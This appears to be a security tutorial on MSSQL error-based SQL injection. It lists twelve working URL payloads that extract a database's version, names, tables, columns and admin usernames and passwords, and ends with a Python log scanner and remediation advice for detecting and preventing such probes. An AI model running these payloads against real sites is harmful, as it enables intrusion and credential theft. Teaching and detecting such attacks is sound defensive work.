I think that anyone who studies security or works in security has, to some degree, a bit of passion and a sense of mission!!!
I. SQL Server + ASP error-based injection
1. The SQL Server error page
(1) Background: when an error occurs while a statement is executed, the error is raised and displayed on the web page.
(2) Environment: SQL Server 2008 + ASPX
(3) Principle: exploit the error that MSSQL raises when a type conversion fails; the error message displays the corresponding information!!!
(4) Limitation: only one field can be extracted at a time.
2. SQL Server + ASP error-based injection examples
(1) Extract the database version: ?id=1 and @@version>0
(2) Extract the current database: ?id=1 and db_name()>0
(3) Extract the current user: ?id=1 and User_Name()>0
(4) Extract other databases: ?id=1 and (SELECT top 1 Name FROM Master..SysDatabases)>0
(5) Extract other databases (excluding master): ?id=1 and (SELECT top 1 Name FROM Master..SysDatabases where name not in ('master'))>0
(6) Extract other databases (excluding master and iNethinkCMS): ?id=1 and (SELECT top 1 Name FROM Master..SysDatabases where name not in ('master','iNethinkCMS'))>0
(7) Extract the tables of the current database: ?id=1 and (select top 1 name from [mydb].sys.all_objects where type='U' AND is_ms_shipped=0)>0
(8) Extract other tables (excluding cmd and test_tmp): ?id=1 and (select top 1 name from mydb.sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('cmd','test_tmp'))>0
(9) Extract columns: ?id=1 and (select top 1 COLUMN_NAME from mydb.information_schema.columns where TABLE_NAME='admin')>0
(10) Extract other columns (excluding ID): ?id=1 and (select top 1 COLUMN_NAME from mydb.information_schema.columns where TABLE_NAME='admin' and COLUMN_NAME not in('ID'))>0
(11) Extract data (username): ?id=1 and (select top 1 username from admin)>0
(12) Extract data (password): ?id=1 and (select top 1 password from admin)>0
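As an added example (not part of the original post), the following Python scans IIS-style access-log lines for the probe shape listed above: an injected "and" followed by a string-returning expression compared with an integer, which is what forces the conversion error. The log lines, their field layout and the probe labels are constructed for the demo.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C-style log lines for the demo (not from a real server).
SAMPLE_LOG = """\
2024-01-01 10:00:01 GET /news.aspx id=1 200
2024-01-01 10:00:02 GET /news.aspx id=1+and+@@version%3E0 500
2024-01-01 10:00:03 GET /news.aspx id=1+and+db_name()%3E0 500
2024-01-01 10:00:04 GET /news.aspx id=1+and+(SELECT+top+1+Name+FROM+Master..SysDatabases)%3E0 500
2024-01-01 10:00:05 GET /news.aspx id=1+and+(select+top+1+username+from+admin)%3E0 500
2024-01-01 10:00:06 GET /search.aspx q=top+10+news+from+today 200
"""

# String-returning expressions: comparing one with an integer forces the
# varchar -> int conversion whose error text leaks the value. Checked in
# order so a specific source wins over the generic "select top 1 ... from".
PROBE_SOURCES = [
    ("version",   r"@@version"),
    ("database",  r"\bdb_name\s*\("),
    ("user",      r"\buser_name\s*\("),
    ("databases", r"sysdatabases"),
    ("tables",    r"sys\.all_objects"),
    ("columns",   r"information_schema\.columns"),
    ("data",      r"\bselect\s+top\s+1\s+\w+\s+from\s+\w+"),
]
# The comparison that triggers the conversion: ")>0", "()>0", "@@version>0".
INT_COMPARE = re.compile(r"(?:\)|@@version)\s*[<>=]\s*\d+", re.IGNORECASE)

def classify_query(raw_query):
    """Label a query string that looks like an MSSQL conversion-error probe."""
    q = unquote_plus(raw_query)
    if not re.search(r"\band\b", q, re.IGNORECASE) or not INT_COMPARE.search(q):
        return None
    for label, pattern in PROBE_SOURCES:
        if re.search(pattern, q, re.IGNORECASE):
            return label
    return None

def scan_log(text):
    """One dict per suspicious request; a 500 beside a hit means the error page was served."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 6 or line.startswith("#"):
            continue  # blank, comment (#Fields) or malformed line
        _date, time, _method, stem, query, status = parts[:6]
        label = classify_query(query)
        if label:
            hits.append({"time": time, "stem": stem, "status": int(status), "probe": label})
    return hits
```

Detection only tells you the probe arrived; the fix on the ASP.NET side is parameterized queries plus not returning detailed error text to the browser (the customErrors setting in web.config), which removes the channel this technique depends on.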